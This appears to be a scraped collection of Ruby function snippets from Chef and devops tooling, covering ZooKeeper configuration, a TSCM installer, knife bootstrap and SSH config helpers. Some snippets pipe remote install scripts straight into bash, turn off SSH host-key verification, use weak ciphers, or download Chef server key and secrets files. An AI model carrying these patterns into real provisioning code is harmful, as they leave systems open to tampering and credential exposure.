"def setup_helper\n\n # Define ZOO_LOG_DIR\n node.default['apache_zookeeper'][\"env_vars\"][\"ZOO_LOG_DIR\"] = node['apache_zookeeper']['log_dir']\n\n # Make sure server ids are set or set them\n if !node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}.empty?\n log \"Using given zoo.cfg config for server ids\"\n\n node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}.each do |key, value|\n if does_server_match_node? value\n @zookeeper_myid = key[\"server.\".size, key.size]\n break\n end\n end\n\n raise \"Unable to find server [#{node[\"fqdn\"]} in zoo.cfg attributes #{node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}}\" if @zookeeper_myid.nil?\n\n elsif node['apache_zookeeper'][\"servers\"].empty?\n log \"Configuring standalone zookeeper cluster\"\n else\n log \"Configuring mult-server zookeeper cluster\"\n\n id = 1\n node['apache_zookeeper'][\"servers\"].each do |server|\n if server.include? \":\"\n # If they include port information in their list of servers just use the raw value\n node.default['apache_zookeeper'][\"zoo.cfg\"][\"server.#{id}\"] = server\n else\n node.default['apache_zookeeper'][\"zoo.cfg\"][\"server.#{id}\"] = \"#{server}:#{node['apache_zookeeper'][\"follower_port\"]}:#{node['apache_zookeeper'][\"election_port\"]}\"\n end\n\n if does_server_match_node? server\n @zookeeper_myid = id.to_s\n end\n\n id = id + 1\n end\n\n raise \"Unable to find server [#{node[\"fqdn\"]} in servers attribute #{node['apache_zookeeper'][\"servers\"]}\" if @zookeeper_myid.nil?\n end\n\n end",
"def helpers_require\n ruby_file_path @api, \"#{service_name_full}::Helpers\"\n end",
"def helpers_paths=(_arg0); end",
"def helpers_paths=(_arg0); end",
"def install_tscm\n case node['platform']\n when 'redhat'\n # Create dir to mount\n directory '/opt/IBM/SCM' do\n recursive true\n action :create\n end\n\n #Create SCM logical volume \n node['tscm']['logvols'].each do |logvol|\n lvm_logical_volume logvol['volname'] do\n group node['tscm']['volumegroup']\n size logvol['size']\n filesystem logvol['fstype']\n mount_point logvol['mountpoint']\n end\n end \n # verifying the tscm installation if already exists\n if ::File.exist?(\"#{node['tscm']['installed_dir']}jacclient\")\n install_status = shell_out(\"#{node['tscm']['installed_dir']}jacclient status\").stdout.chop\n if install_status.include?('The Tivoli Security Compliance Manager client is currently running')\n Chef::Log.error('TSCM client already installed on ' + (node['tscm']['node_name']).to_s + '........Nothing to do')\n end\n else\n Chef::Log.info('Installing TSCM ....')\n\n # creating a temporary directory for installinsg TSCM\n tempfolder = '/opt/IBM/tscm_temp'\n\n directory tempfolder.to_s do\n action :create\n end\n\n # get TSCM media to our temp dir\n media = tempfolder + '/' + node['tscm']['base_package'].to_s\n\n remote_file media.to_s do\n source node['tscm']['url'].to_s\n owner 'root'\n group 'root'\n mode '0755'\n action :create_if_missing\n end\n\n # Unpacking TSCM media\n execute 'unpack-media' do\n command 'cd ' + tempfolder.to_s + ' ; ' + ' tar -xf ' + media.to_s\n action :run\n not_if { ::File.exist?(\"#{media}/#{node['tscm']['base_package']}\") }\n end\n\n # run the installation script\n bash 'install-tscm' do\n code <<-EOH\n cd #{tempfolder}\n chmod 744 install_x64.sh\n ./install_x64.sh\n EOH\n end\n\n # copy the ssh key for TSCM to /opt/IBM/\n cookbook_file node['tscm']['key'].to_s do\n source node['tscm']['key_name'].to_s\n owner 'root'\n group 'root'\n mode '400'\n action :create_if_missing\n end\n\n # create temp directory to copy the auditing patching file\n directory node['tscm']['patch_dir'].to_s do\n recursive true\n owner 'root'\n group 'root'\n mode '0744'\n action :create\n end\n\n # copy the powershell script to node system\n cookbook_file node['tscm']['copy_script_path'].to_s do\n source 'copy_script.ps1'\n owner 'root'\n group 'root'\n mode '750'\n action :create\n end\n\n # copy the powershell script to TSCM Server\n bash 'copy-powershell-script-to-tscm-server' do\n code <<-EOH\n scp -C -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['copy_script_path']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/c:/users/scm_auto_usr/\n\t EOH\n live_stream true\n action :run\n end\n\n # run the powershell scripts\n execute 'run-powershell-script' do\n command \"ssh -n -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell -File 'C:/Users/scm_auto_usr/copy_script.ps1'\"\n live_stream true\n action :run\n end\n\n # copy the audit patching file\n execute 'download-audi-patching-file' do\n command \"scp -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/C:/Users/scm_auto_usr/lssec_secfixdb_all.tar.gz /opt/IBM/SCM/client/software/completed/\"\n live_stream true\n action :run\n not_if { ::File.exist?(node['tscm']['audit_file'].to_s) }\n end\n\n client_pref = shell_out(\"grep 'debug=true' #{node['tscm']['client_pref']} \").stdout.chop\n\n if client_pref.include?('debug=true')\n Chef::Log.info('File Up to date..........Nothing to do')\n else\n # update the client.pref file to debug mode\n execute 'update-client.pref' do\n 
command \"sed -i -e 's/debug=false/debug=true/' #{node['tscm']['client_pref']}\"\n action :run\n end\n\n # restarting TSCM agent service for changes to take effect\n service node['tscm']['service_name'].to_s do\n action :stop\n end\n\n service node['tscm']['service_name'].to_s do\n action :start\n end\n end\n end\n\n # installing on aix\n when 'aix'\n Chef::Log.info('Installing TSCM on AIX platform...........')\n\n if ::File.exist?(\"#{node['tscm']['installed_dir']}jacclient\")\n install_status = shell_out(\"#{node['tscm']['installed_dir']}jacclient status\").stdout.chop\n if install_status.include?('HCVIN0033I The Tivoli Security Compliance Manager client is currently running')\n Chef::Log.error('TSCM client already installed on ' + (node['tscm']['node_name']).to_s + '........Nothing to do')\n end\n else\n Chef::Log.info('TSCM not installed ........Installing TSCM ')\n\n # creating temporary directory for copying tscm binaries\n tempfolder = '/opt/IBM/tscm_software'\n\n directory tempfolder.to_s do\n action :create\n not_if { ::File.exist?(tempfolder.to_s) }\n end\n\n media = tempfolder.to_s + '/' + (node['tscm']['base_package']).to_s\n node.default['tscm']['package_name'] = (node['tscm']['base_package']).to_s.chomp('.tar')\n\n # downloading binaries from the url\n remote_file media.to_s do\n source node['tscm']['url'].to_s\n owner 'root'\n mode '0755'\n action :create_if_missing\n end\n\n # creating prerequisite FS\n # create volume group ibmvg as mandatory requirement\n execute 'create-VG-ibmvg' do\n command 'mkvg -f -y ibmvg hdisk1'\n action :run\n returns [0, 1]\n not_if { shell_out('lsvg | grep ibmvg').stdout.chop != '' }\n end\n\n # required FS\n volumes = [\n { lvname: 'lv_scm', fstype: 'jfs2', vgname: 'ibmvg', size: 500, fsname: '/opt/IBM/SCM' },\n ]\n # Custom FS creation\n volumes.each do |data|\n ibm_tscm_makefs \"creation of #{data[:fsname]} file system\" do\n lvname data[:lvname]\n fsname data[:fsname]\n vgname data[:vgname]\n fstype data[:fstype]\n size data[:size]\n end\n end\n\n # Unpacking TSCM media\n execute 'unpack-media' do\n command 'cd ' + tempfolder.to_s + ' ; ' + ' tar -xf ' + media.to_s\n action :run\n not_if { ::File.exist?(media.to_s + node['tscm']['package_name'].to_s + 'install_aix6.sh') }\n end\n\n # run the installation script\n bash 'install-tscm' do\n code <<-EOH\n cd #{tempfolder}\n chmod +x install_aix6.sh\n ./install_aix6.sh \n EOH\n end\n\n # copy the ssh key for TSCM to /opt/IBM/ directory\n cookbook_file node['tscm']['key'].to_s do\n source node['tscm']['key_name'].to_s\n owner 'root'\n mode '400'\n action :create_if_missing\n end\n\n # create temp directory to copy the auditing patching file\n directory node['tscm']['patch_dir'].to_s do\n recursive true\n owner 'root'\n mode '0744'\n action :create\n end\n\n # copy the audit patching file\n execute 'download-audi-patching-file' do\n command \"scp -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/C:/PROGRA~1/IBM/SCM/client/software/completed/lssec_secfixdb_all.tar.gz /opt/IBM/SCM/client/software/completed/\"\n action :run\n not_if { ::File.exist?(node['tscm']['audit_file'].to_s) }\n end\n\n # changing log-level to debug mode\n client_pref = shell_out(\"grep 'debug=true' #{node['tscm']['client_pref']} \").stdout.chop\n\n if client_pref.include?('debug=true')\n Chef::Log.info('File Up to date..........Nothing to do')\n else\n # update the client.pref file to debug mode\n execute 'update-client.pref' do\n command \"sed -e 
's/debug=false/debug=true/g' #{node['tscm']['client_pref']}\"\n action :run\n end\n\n # restarting TSCM agent service for changes to take effect\n execute 'restart-tscm-service' do\n command '/opt/IBM/SCM/client/jacclient restart'\n action :run\n end\n end\n end\n end\nend",
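Both platform branches of install_tscm toggle debug=true by shelling out to sed, grepping first to stay idempotent. A sketch of an in-Chef alternative using Chef::Util::FileEdit, assuming the same client_pref attribute; this is one possible refactor, not the cookbook's code:

# Sketch: idempotent debug toggle without shelling out to sed.
ruby_block 'enable-tscm-debug' do
  block do
    fe = Chef::Util::FileEdit.new(node['tscm']['client_pref'])
    fe.search_file_replace(/debug=false/, 'debug=true')
    fe.write_file
  end
  not_if { ::File.foreach(node['tscm']['client_pref']).any? { |l| l.include?('debug=true') } }
end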
"def cookbook_url_base\n \"cookbooks\"\n end",
"def bootstrap_chef_script role, settings\n erubis_template(\n File.dirname(__FILE__)+\"/../config/user_data_script-#{role}.sh.erb\",\n :public_ip => settings[:elastic_ip],\n :hostname => settings[:user_data][:attributes][:node_name],\n :chef_server_fqdn => settings[:user_data][:chef_server].gsub(%r{http://(.*):\\d+},'\\1'),\n :ubuntu_version => 'lucid',\n :bootstrap_scripts_url_base => settings[:bootstrap_scripts_url_base],\n :chef_config => settings[:user_data]\n )\nend",
"def install_lazyk(prefix)\n cookbook_file \"#{Chef::Config[:file_cache_path]}/lazy.cpp\" do\n user 'root'\n group 'root'\n mode '0644'\n not_if \"test -e #{prefix}/bin/lazyk\"\n end\n\n bash \"install-lazyk\" do\n user 'root'\n cwd Chef::Config[:file_cache_path]\n code <<-EOH\n set -ex\n mkdir -p #{prefix}/bin\n g++ lazy.cpp -o #{prefix}/bin/lazyk\n EOH\n not_if \"test -e #{prefix}/bin/lazyk\"\n end\nend",
"def printstuff(stuff)\n Chef::Log.info\" Stuff is: #{stuff}\"\nend",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def chef_client\n command = \"chef-client\"\n if sudo\n command = \"sudo #{command}\"\n end\n\n run(command)\n end",
"def helpers_paths; end",
"def helpers_paths; end",
"def helpers_paths; end",
"def helpers_paths; end",
"def chef\n @chef ||= Appd::Server::Chef.new ssh\n end",
"def manual_bootstrap_for_node\n validate!([:bootstrap_pass])\n\n #Where the validation pem and chef-client exist on\n #the chef workstation this is run from\n validation_pem_path = Chef::Config[:validation_key]\n puts \"Using client key #{validation_pem_path}\"\n chef_client_path = Chef::Config[:knife][:chef_client_aix_path]\n puts \"Using chef-client located in #{chef_client_path}\"\n\n if validation_pem_path.nil? or chef_client_path.nil?\n puts \"No client validation pem or chef-client installable specified in knife.rb. Skipping Chef Bootstrap...\"\n return nil\n end\n\n #Where to place these files on the target server\n remote_chef_client_path = \"/tmp/2014-02-06-chef.11.10.0.0.bff\"\n remote_validation_pem_path = \"/etc/chef/validation.pem\"\n\n #For some reason, Net::SSH and Net::SCP only work on\n #AIX using :kex => \"diffie-hellman-group1-sha1\" and\n # :encryption => [\"blowfish-cbc\", \"3des-cbc\"]\n # :paranoid => false (avoids host key verification)\n Net::SSH.start(get_config(:ip_address), \n get_config(:bootstrap_user) || \"root\", \n :password => get_config(:bootstrap_pass), \n :kex => \"diffie-hellman-group1-sha1\",\n :encryption => [\"blowfish-cbc\", \"3des-cbc\"],\n :paranoid => false) do |ssh| \n\n #Copy the chef-client .bff file to the client machine in /tmp\n puts \"Copying chef client binary to client\"\n ssh.scp.upload!(chef_client_path, remote_chef_client_path)\n\n #Run the install command\n puts \"Running chef client install\"\n output = ssh.exec!(\"installp -aYFq -d #{remote_chef_client_path} chef\")\n Chef::Log.debug(\"Chef Client install output:\\n#{output}\")\n\n #Run the configure client command\n puts \"Running knife configure client command\"\n output = ssh.exec!(\"knife configure client -s #{get_config(:register_node)} /etc/chef\")\n Chef::Log.debug(\"Knife Configure output:\\n#{output}\")\n\n #Copy the validation key to /etc/chef on the client\n puts \"Uploading validation.pem to client\"\n ssh.scp.upload!(validation_pem_path, remote_validation_pem_path)\n\n #Edit /etc/chef/client.rb so that it points at the location of the validator\n puts \"Adding validator key path to client.rb\"\n cmd = %Q{echo \"validator_key '#{remote_validation_pem_path}'\" >> /etc/chef/client.rb}\n output = ssh.exec!(cmd)\n Chef::Log.debug(\"#{output}\")\n\n #Register the client node with the Chef server, by running chef-client\n #Add additional handling of this command to determine if the chef-client\n #run finished successfully or not.\n puts \"Running chef-client to register as a Chef node\"\n output = \"\"\n stderr_out = \"\"\n exit_code = nil\n ssh.exec(\"chef-client\") do |ch, success|\n unless success\n abort \"FAILED: chef-client command failed to execute on client\"\n end\n ch.on_data do |ch,data|\n output+=data\n end\n ch.on_extended_data do |ch,type,data|\n stderr_out+=data\n end\n ch.on_request(\"exit-status\") do |ch,data|\n exit_code = data.read_long\n end\n end\n ssh.loop\n if exit_code != 0\n puts \"Initial chef-client run failed. Please verify client settings and rerun chef-client to register this server as a node with #{get_config(:register_node)}\"\n return nil\n end\n Chef::Log.debug(\"chef-client command output:\\n#{output}\")\n end\n end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def chef_context\n @chef_context || ::Capistrano.env\n end",
"def delivery_chef_server\n DeliveryTruck::Helpers.delivery_chef_server(node)\n end",
"def current_version\n node['chef_packages']['chef']['version']\nend",
"def current_version\n node['chef_packages']['chef']['version']\nend",
"def lybunt_setup\n end",
"def chef_solo\n fetch(:chef_solo).to_s || 'chef-solo'\n end",
"def chef_client(host, options = {})\n raise RuntimeError, \"abstract function: must be implemented on includer\"\n end",
"def bootstrap_for_node\n bootstrap = Chef::Knife::Bootstrap.new\n bootstrap.name_args = [config[:fqdn]]\n bootstrap.config[:run_list] = get_config(:run_list).split(/[\\s,]+/)\n bootstrap.config[:secret_file] = get_config(:secret_file)\n bootstrap.config[:hint] = get_config(:hint)\n bootstrap.config[:ssh_user] = get_config(:ssh_user)\n bootstrap.config[:ssh_password] = get_config(:ssh_password)\n bootstrap.config[:ssh_port] = get_config(:ssh_port)\n bootstrap.config[:identity_file] = get_config(:identity_file)\n bootstrap.config[:chef_node_name] = get_config(:chef_node_name)\n bootstrap.config[:prerelease] = get_config(:prerelease)\n bootstrap.config[:bootstrap_version] = get_config(:bootstrap_version)\n bootstrap.config[:distro] = get_config(:distro)\n bootstrap.config[:use_sudo] = true unless get_config(:ssh_user) == 'root'\n bootstrap.config[:template_file] = get_config(:template_file)\n bootstrap.config[:environment] = get_config(:environment)\n bootstrap.config[:first_boot_attributes] = get_config(:first_boot_attributes)\n bootstrap.config[:log_level] = get_config(:log_level)\n # may be needed for vpc_mode\n bootstrap.config[:no_host_key_verify] = get_config(:no_host_key_verify)\n bootstrap\n end",
"def cookbook_clean_start\n end",
"def server_software; end",
"def base_recipe()\n warn \"#{self} hasn't been overridden to return a Proc!!\"\n lambda {\n # put your capistrano config and tasks in here\n }\n end",
"def run\n ngen_auth\n @validate = Validator.new\n stack = EcoSystem.new\n @instanceparameters = stack.yaml_reader(config[:yaml])\n stack.validate = @validate\n config[:action] = 'create'\n stack.options = config\n stack.supress_output ='1'\n stack.instanceparameters = @instanceparameters\n inst_result = stack.opt_parse\n ho_hum\n \n inst_result.each do |server|\n config[:inst] = server['server']['display_name']\n instance = {}\n # puts chef_attrs = server['server']['userdata'].at(0)['chef']\n chef_attrs = server['server']['userdata'].at(0)['chef'] if !server['server']['userdata'].at(0)['chef'].nil?\n chef_attrs.each do |attr, value|\n instance[attr] = value\n end\n chef_node_configuration(instance)\n config[:chef_node_name] = config[:inst]\n inst_details = AttrFinder.new(server)\n inst_details.options = config\n inst_details.validate = @validate\n inst_details.function = 'server' \n inst = InstanceClient.new\n inst.validate = @validate\n inst.options = config\n inst.supress_output ='1'\n inst.instanceparameters = @instanceparameters\n ssh_host = inst.list_instance_ip(inst_details.compartment, inst_details.instance).at(1)\n bootstrap_for_linux_node(ssh_host).run\n node_attributes(ssh_host, 'IaaS')\n end\n end",
"def install_spec_helper\n stubbed_facts = String.new\n if @config[@origin].has_key?('stubbed_facts')\n @config[@origin]['stubbed_facts'].keys.each do |k|\n stubbed_facts += \" :#{k} => '#{@config[@origin]['stubbed_facts'][k]}',\\n\"\n end\n end\n\n code_coverage = String.new\n if @config[@origin].has_key?('code_coverage')\n percent = @config[@origin]['code_coverage']\n code_coverage = \" c.after(:suite) do\n RSpec::Puppet::Coverage.report!(#{percent})\n end\"\n end\n\n subs = {\n '##STUBBED_FACTS##' => stubbed_facts,\n '##CODE_COVERAGE##' => code_coverage,\n }\n\n install_template([\"#{@templates}/spec_helper.rb\"], 'spec/spec_helper.rb', subs)\n end",
"def content\n return <<-EOF\ndefault lucie\n\nlabel lucie\nkernel #{ INSTALLER_KERNEL }\nappend initrd=#{ initrd } ip=dhcp devfs=nomount root=/dev/nfs nfsroot=#{ @nfsroot } boot=live hostname=#{ @node.name } #{ $KERNEL_OPTIONS }\nEOF\n end",
"def knife(sub_cmd)\n chef_exec(knife_cmd(sub_cmd))\nend",
"def helpers &blk\n @helpers = blk\n end",
"def run\n Shef::Extensions.extend_context_object(self)\n ssh_config = []\n\n ssh_config << \"\\n\\n### BEGIN KNIFE BLOCK ###\"\n ssh_config << \"## This was generated by `knife setup ssh`:\"\n\n STDOUT.sync = true\n\n nodes.all do |n|\n next if /vagrant/.match(n.name)\n name = n.name\n name << '.lisausa.net' unless /\\.lisausa.net\\Z/.match(n.name)\n\n begin\n hostname = n.ipaddress\n rescue => ex\n ui.warn(\"Error (#{ex.inspect}) while getting #ipaddress for #{n.name}\")\n next\n end\n\n ssh_config << [\n \"Host #{name}\",\n \" HostName #{hostname}\",\n \" HostKeyAlias #{[name,hostname,n.macaddress].join('-')}\"\n ]\n end\n\n if (c = Chef::Config.knife).keys.grep(/identity_file|ssh_user/).any?\n ssh_config.push [\n \"Host *.lisausa.net\",\n \" IdentitiesOnly yes\",\n \" PasswordAuthentication no\",\n \" ForwardAgent yes\"\n ]\n ssh_config.push \" IdentityFile #{c[:identity_file]}\" if c[:identity_file]\n ssh_config.push \" User #{c[:ssh_user]}\" if c[:ssh_user]\n end\n\n ssh_config << \"### END KNIFE BLOCK ###\"\n ssh_config = ssh_config.flatten.join(\"\\n\")\n\n file_path = File.join(ENV['HOME'], '.ssh', 'config')\n if config[:write] or ui.ask_question(\"Write config to #{file_path} (Y/N)?\", default: 'N').downcase == 'y'\n FileUtils.copy_file(file_path, \"#{file_path}~\")\n File.open(file_path, File::RDWR|File::CREAT) do |f|\n f.flock(File::LOCK_EX)\n\n contents = f.read.gsub(/\\n*### BEGIN KNIFE BLOCK ###.+?(### END KNIFE BLOCK ###|\\Z)/m, ssh_config)\n unless contents.include?('### BEGIN KNIFE BLOCK ###')\n contents << ssh_config\n end\n f.rewind\n f.truncate(0)\n f.write contents\n end\n ui.msg \"Wrote to #{file_path}. Previous contents were backed up to #{file_path}~\"\n else\n ui.msg \"Copy and paste the following into your #{file_path} file:\"\n ui.msg ssh_config\n end\n end",
"def chef_config\n ci = @json.split('/').last.gsub('.json', '')\n \"#{prefix_root}/home/oneops/#{@circuit}/components/cookbooks/\" \\\n \"chef-#{ci}.rb\"\n end",
"def client\n return @client if @client\n\n @client = Chef::Client.new\n @client.ohai.data = Mash.from_hash(Fauxhai.mock(options).data)\n @client.load_node\n @client.build_node\n @client.save_updated_node\n @client\n end",
"def version_helper; end",
"def version_helper; end",
"def version_helper; end",
"def version_helper; end",
"def download_bootstrap_files(machine_name = 'bootstrap-backend')\n # download server files\n %w{ actions-source.json webui_priv.pem }.each do |analytics_file|\n machine_file \"/etc/opscode-analytics/#{analytics_file}\" do\n local_path \"#{node['qa-chef-server-cluster']['chef-server']['file-dir']}/#{analytics_file}\"\n machine machine_name\n action :download\n end\n end\n\n# download more server files\n %w{ pivotal.pem webui_pub.pem private-chef-secrets.json }.each do |opscode_file|\n machine_file \"/etc/opscode/#{opscode_file}\" do\n local_path \"#{node['qa-chef-server-cluster']['chef-server']['file-dir']}/#{opscode_file}\"\n machine machine_name\n action :download\n end\n end\nend",
"def chef_error(e)\n if e.is_a?(::RightScale::Exceptions::Exec)\n msg = \"External command error: \"\n if match = /RightScale::Exceptions::Exec: (.*)/.match(e.message)\n cmd_output = match[1]\n else\n cmd_output = e.message\n end\n msg += cmd_output\n msg += \"\\nThe command was run from \\\"#{e.path}\\\"\" if e.path\n elsif e.is_a?(::Chef::Exceptions::ValidationFailed) && (e.message =~ /Option action must be equal to one of:/)\n msg = \"[chef] recipe references an action that does not exist. #{e.message}\"\n elsif e.is_a?(::NoMethodError) && (missing_action_match = /undefined method .action_(\\S*)' for #<\\S*:\\S*>/.match(e.message)) && missing_action_match[1]\n msg = \"[chef] recipe references the action <#{missing_action_match[1]}> which is missing an implementation\"\n else\n msg = \"Execution error:\\n\"\n msg += e.message\n file, line, meth = e.backtrace[0].scan(BACKTRACE_LINE_REGEXP).flatten\n line_number = line.to_i\n if file && line && (line_number.to_s == line)\n dir = AgentConfig.cookbook_download_dir\n if file[0..dir.size - 1] == dir\n path = \"[COOKBOOKS]/\" + file[dir.size..file.size]\n else\n path = file\n end\n msg += \"\\n\\nThe error occurred line #{line} of #{path}\"\n msg += \" in method '#{meth}'\" if meth\n context = \"\"\n if File.readable?(file)\n File.open(file, 'r') do |f|\n lines = f.readlines\n lines_count = lines.size\n if lines_count >= line_number\n upper = [lines_count, line_number + 2].max\n padding = upper.to_s.size\n context += context_line(lines, line_number - 2, padding)\n context += context_line(lines, line_number - 1, padding)\n context += context_line(lines, line_number, padding, '*')\n context += context_line(lines, line_number + 1, padding)\n context += context_line(lines, line_number + 2, padding)\n end\n end\n end\n msg += \" while executing:\\n\\n#{context}\" unless context.empty?\n end\n end\n msg\n end",
"def install_dependencies\n recipe_eval do\n run_context.include_recipe 'chef-sugar::default'\n run_context.include_recipe 'build-essential::default'\n\n case node.platform_family\n when 'debian'\n package 'curl'\n package 'git-core'\n package 'libxml2-dev'\n package 'libxslt-dev'\n package 'zlib1g-dev'\n package 'ncurses-dev'\n package 'libssl-dev'\n when 'freebsd'\n package 'textproc/libxml2'\n package 'textproc/libxslt'\n package 'devel/ncurses'\n when 'mac_os_x'\n run_context.include_recipe 'homebrew::default'\n package 'libxml2'\n package 'libxslt'\n package 'openssl'\n when 'rhel'\n package 'curl'\n package 'bzip2'\n package 'file'\n package 'git'\n package 'libxml2-devel'\n package 'libxslt-devel'\n package 'ncurses-devel'\n package 'zlib-devel'\n package 'openssl-devel'\n end\n end\n end",
"def helpers_path=(_arg0); end",
"def install_chef\n ssh.exec! \"curl -L https://www.opscode.com/chef/install.sh | bash\", sudo: true\n chef.init\n return Appd::Server::Chef::APPD_COOKBOOK_PATH\n end",
"def get_install_client\n purge\n s('cd /tmp')\n s('wget https://apt.puppetlabs.com/puppetlabs-release-trusty.deb')\n s('sudo apt-get update')\n s('sudo apt-get -y install puppet')\nend",
"def setup\n required_version = YAML.load_file(\"#{@repository_path}/chef_versions.yml\")['workstation']\n Bundler.with_unbundled_env do\n exit_status, stdout, _stderr = @cmd_runner.run_cmd '/opt/chef-workstation/bin/chef --version', expected_code: [0, :command_error]\n existing_version =\n if exit_status == :command_error\n 'not installed'\n else\n expected_match = stdout.match(/^Chef Workstation version: (.+)\\.\\d+$/)\n expected_match.nil? ? 'unreadable' : expected_match[1]\n end\n log_debug \"Current Chef version: #{existing_version}. Required version: #{required_version}\"\n @cmd_runner.run_cmd \"curl -L https://omnitruck.chef.io/install.sh | #{@cmd_runner.root? ? '' : 'sudo '}bash -s -- -P chef-workstation -v #{required_version}\" unless existing_version == required_version\n end\n end",
"def init\n create_file options[:inventory_config] do\n<<-YML\n# sources:\n# - \"https://supermarket.getchef.com\"\n# cookbooks:\n# cookbook-name:\n# versions:\n# - \"~> 4.0.2\"\n# - \"> 5.0.0\"\n# git:\n# location: url | path\n# branches:\n# - a_branch_name\n# refs:\n# - SHA\n\nYML\n end\n end",
"def saveChefMetadata\n self.class.loadChefLib\n @server.getSSHConfig # why though\n MU.log \"Saving #{@server.mu_name} Chef artifacts\"\n\n begin\n chef_node = ::Chef::Node.load(@server.mu_name)\n rescue Net::HTTPServerException\n @server.deploy.sendAdminSlack(\"Couldn't load Chef metadata on `#{@server.mu_name}` :crying_cat_face:\")\n raise MU::Groomer::RunError, \"Couldn't load Chef node #{@server.mu_name}\"\n end\n\n # Figure out what this node thinks its name is\n system_name = chef_node['fqdn'] if !chef_node['fqdn'].nil?\n MU.log \"#{@server.mu_name} local name is #{system_name}\", MU::DEBUG\n\n chef_node.normal.app = @config['application_cookbook'] if !@config['application_cookbook'].nil?\n chef_node.normal[\"service_name\"] = @config[\"name\"]\n chef_node.normal[\"credentials\"] = @config[\"credentials\"]\n chef_node.normal[\"windows_admin_username\"] = @config['windows_admin_username']\n chef_node.chef_environment = MU.environment.downcase\n if @server.config['cloud'] == \"AWS\"\n chef_node.normal[\"ec2\"] = MU.structToHash(@server.cloud_desc)\n end\n\n if @server.windows?\n chef_node.normal['windows_admin_username'] = @config['windows_admin_username']\n chef_node.normal['windows_auth_vault'] = @server.mu_name\n chef_node.normal['windows_auth_item'] = \"windows_credentials\"\n chef_node.normal['windows_auth_password_field'] = \"password\"\n chef_node.normal['windows_auth_username_field'] = \"username\"\n chef_node.normal['windows_ec2config_password_field'] = \"ec2config_password\"\n chef_node.normal['windows_ec2config_username_field'] = \"ec2config_username\"\n chef_node.normal['windows_sshd_password_field'] = \"sshd_password\"\n chef_node.normal['windows_sshd_username_field'] = \"sshd_username\"\n end\n\n # If AD integration has been requested for this node, give Chef what it'll need.\n if !@config['active_directory'].nil?\n chef_node.normal['ad']['computer_name'] = @server.mu_windows_name\n chef_node.normal['ad']['node_class'] = @config['name']\n chef_node.normal['ad']['domain_name'] = @config['active_directory']['domain_name']\n chef_node.normal['ad']['node_type'] = @config['active_directory']['node_type']\n chef_node.normal['ad']['domain_operation'] = @config['active_directory']['domain_operation']\n chef_node.normal['ad']['domain_controller_hostname'] = @config['active_directory']['domain_controller_hostname'] if @config['active_directory'].has_key?('domain_controller_hostname')\n chef_node.normal['ad']['netbios_name'] = @config['active_directory']['short_domain_name']\n chef_node.normal['ad']['computer_ou'] = @config['active_directory']['computer_ou'] if @config['active_directory'].has_key?('computer_ou')\n chef_node.normal['ad']['domain_sid'] = @config['active_directory']['domain_sid'] if @config['active_directory'].has_key?('domain_sid')\n chef_node.normal['ad']['dcs'] = @config['active_directory']['domain_controllers']\n chef_node.normal['ad']['domain_join_vault'] = @config['active_directory']['domain_join_vault']['vault']\n chef_node.normal['ad']['domain_join_item'] = @config['active_directory']['domain_join_vault']['item']\n chef_node.normal['ad']['domain_join_username_field'] = @config['active_directory']['domain_join_vault']['username_field']\n chef_node.normal['ad']['domain_join_password_field'] = @config['active_directory']['domain_join_vault']['password_field']\n chef_node.normal['ad']['domain_admin_vault'] = @config['active_directory']['domain_admin_vault']['vault']\n chef_node.normal['ad']['domain_admin_item'] = 
@config['active_directory']['domain_admin_vault']['item']\n chef_node.normal['ad']['domain_admin_username_field'] = @config['active_directory']['domain_admin_vault']['username_field']\n chef_node.normal['ad']['domain_admin_password_field'] = @config['active_directory']['domain_admin_vault']['password_field']\n end\n\n # Amazon-isms, possibly irrelevant\n awscli_region_widget = {\n \"compile_time\" => true,\n \"config_profiles\" => {\n \"default\" => {\n \"options\" => {\n \"region\" => @config['region']\n }\n }\n }\n }\n chef_node.normal['awscli'] = awscli_region_widget\n\n if !@server.cloud.nil?\n chef_node.normal['cloudprovider'] = @server.cloud\n\n # XXX In AWS this is an OpenStruct-ish thing, but it may not be in\n # others.\n chef_node.normal[@server.cloud.to_sym] = MU.structToHash(@server.cloud_desc)\n end\n\n tags = MU::MommaCat.listStandardTags\n tags.merge!(MU::MommaCat.listOptionalTags) if @config['optional_tags']\n\n if !@config['tags'].nil?\n @config['tags'].each { |tag|\n tags[tag['key']] = tag['value']\n }\n end\n\n if @config.has_key?(\"monitor\") and !@config['monitor']\n tags['nomonitor'] = true\n end\n\n chef_node.normal['tags'] = tags\n chef_node.save\n\n # If we have a database make sure we grant access to that vault.\n # In some cases the cached getLitter response will not have all the resources in the deploy, so lets not use the cache.\n if @config.has_key?('dependencies')\n deploy = MU::MommaCat.getLitter(MU.deploy_id, use_cache: false)\n @config['dependencies'].each{ |dep|\n if dep['type'] == \"database\" && deploy.deployment.has_key?(\"databases\") && deploy.deployment[\"databases\"].has_key?(dep['name'])\n deploy.deployment[\"databases\"][dep['name']].values.each { |database|\n grantSecretAccess(database['vault_name'], database['vault_item']) if database.has_key?(\"vault_name\") && database.has_key?(\"vault_item\")\n }\n end\n }\n end\n\n # Finally, grant us access to some pre-existing Vaults.\n if !@config['vault_access'].nil?\n @config['vault_access'].each { |vault|\n grantSecretAccess(vault['vault'], vault['item'])\n }\n end\n end",
"def initialize(*args)\n super\n @action = :create\n @provider = Chef::Provider::LinodeDomainApi\nend",
